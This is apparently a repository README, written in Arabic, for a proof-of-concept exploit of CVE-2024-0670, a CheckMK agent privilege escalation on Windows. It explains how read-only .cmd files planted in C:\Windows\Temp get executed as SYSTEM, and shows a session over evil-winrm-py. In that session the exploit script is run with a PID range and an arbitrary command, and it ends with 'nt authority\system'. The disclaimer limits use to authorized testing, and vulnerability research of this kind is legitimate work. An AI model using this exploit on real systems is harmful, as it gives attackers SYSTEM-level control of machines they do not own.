
PoC لـ CVE-2024-0670
يوفر هذا المستودع استغلالًا لإثبات المفهوم (PoC) لثغرة CVE-2024-0670، التي تؤثر على وكيل CheckMK في أنظمة Windows. تحدث الثغرة عندما يقوم وكيل CheckMK بإنشاء وتنفيذ ملفات مؤقتة في دليل C:\Windows\Temp. يمكن للمهاجم إساءة استخدام هذا السلوك عن طريق وضع ملفات خبيثة مسبقًا في هذا الدليل مع تفعيل الحماية ضد الكتابة. عندما يحاول الوكيل إنشاء ملف مؤقت موجود بالفعل كملف للقراءة فقط، يفشل في استبداله لكنه يظل ينفذ الملف الموجود بصلاحيات SYSTEM، مما يتيح تصعيد الامتيازات.
مرجع الاستشارة: SEC Consult - تصعيد محلي للامتيازات عبر ملفات قابلة للكتابة في وكيل Checkmk
هذا المشروع مخصص لأغراض التعليم والبحث والاختبارات الأمنية المصرّح بها فقط.
لا تستخدم هذا الكود على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
المؤلف ليس مسؤولًا عن أي ضرر أو إساءة استخدام.
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system